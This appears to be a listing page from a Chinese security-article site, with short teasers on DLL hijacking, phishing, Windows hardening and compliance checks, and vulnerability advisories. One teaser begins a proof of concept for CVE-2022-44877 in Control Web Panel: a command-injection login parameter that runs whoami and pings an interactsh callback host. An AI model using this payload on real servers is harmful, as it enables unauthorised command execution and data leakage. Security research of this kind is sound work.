如何通过使用原生的可执行文件(例如 hdwwiz.exe)来加载控制面板项(.cpl 文件)的技巧。.c...
01月03日23 views评论dll劫持
可执行文件
一起全账户接管漏洞案例
声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。文章首发于个人博客:https://myb...
11月03日36 views评论控制面板
账户接管漏洞
等保能力验证2022—Windows主机(改)
知识宝库在此藏,一键关注获宝藏这里对之前发布的能力验证Windows主机这块,身份鉴别b)登录超时自动退出这块有补充,遗漏了一个查看点。详情可对照 等保能力验证2022—Windows主机&...
10月27日32 views评论控制面板
身份鉴别
利用被攻击的网站发起网络钓鱼诈骗
发起网络钓鱼的攻击者希望他们设计的虚假钓鱼页面尽可能花费最少的成本来产生尽可能多的收入,所以他们会倾向使用各种工具和技术来逃避检测,以节省时间和成本,比如使用网络钓鱼工具包或Telegram木马的自动...
09月05日29 views评论网络钓鱼
钓鱼页面
安全服务之安全基线及加固(一)Windows篇
一个热爱分享的公众号和一群热爱这个行业的作者们。此文章为连载文章0x01 前言安全服务工程师大家应该都知道,对于他的岗位职责你可能会说不就是渗透测试啊、应急响应嘛.....实际上正式一点的企业对于安服...
05月15日125 views评论安全服务
管理工具
Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877
POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Hos...
01月28日177 views评论rce
whoami
渗透技巧 | 关于csv文件在渗透中的妙用
何为csv逗号分隔值(Comma-Separated Values,CSV,有时也称为字符分隔值,因为分隔字符也可以不是逗号),其文件以纯文本形式存储表格数据(数字和文本)。纯文本意味着该文件是一个字...
08月28日49 views评论csv
控制面板
黑客已接管Wiseasy控制面板 可访问控制全球14万支付终端
安全资讯1、QQ 音乐已在用户主页、信息发布页等位置展示 IP 属地信息IT之家了解到,根据 QQ 音乐的公告信息,7 月 31 日起,QQ 音乐已在用户个人主页、信息发布页等位置展示 IP 属地,具...
08月04日安全新闻98 views评论攻击者
网络攻击
HW:Windows终端测评
微信公众号:计算机与网络安全▼本文以Windows 7为例,介绍如何实施针对Windows终端操作系统的安全测评。其他版本的Windows操作系统与其类似。1、身份鉴别机制测评1)通过“开始”→“控制...
07月24日34 views评论windows
日志
Windows操作系统安全加固规范
本文针对Windows操作系统的账号管理、账户授权、日志配置、通信协议(IP协议安全)以及设置其他安全进行合规性检查和配置。一、账户管理:1、分配账...
07月24日876 views评论操作系统
管理工具
Microsoft Exchange远程代码执行漏洞安全通告
一、漏洞名称MicrosoftExchange远程代码执行漏洞二、漏洞编号CVE-2020-0688三、漏洞背景2020年2月11日,Microsoft发布了重要级别的补丁程序,以解决Microsof...
07月12日47 views评论攻击者
远程代码执行漏洞
现代网络安全架构必备功能
样式和用例不断变化,网络安全也必须更加全面、智能、响应快。信息技术行业发展早期,Sun Microsystems 代表着计算界的远见卓识。Sun 公司率先提出了 “网络就是电脑” (The netwo...
07月05日13 views评论安全技术
网络安全
3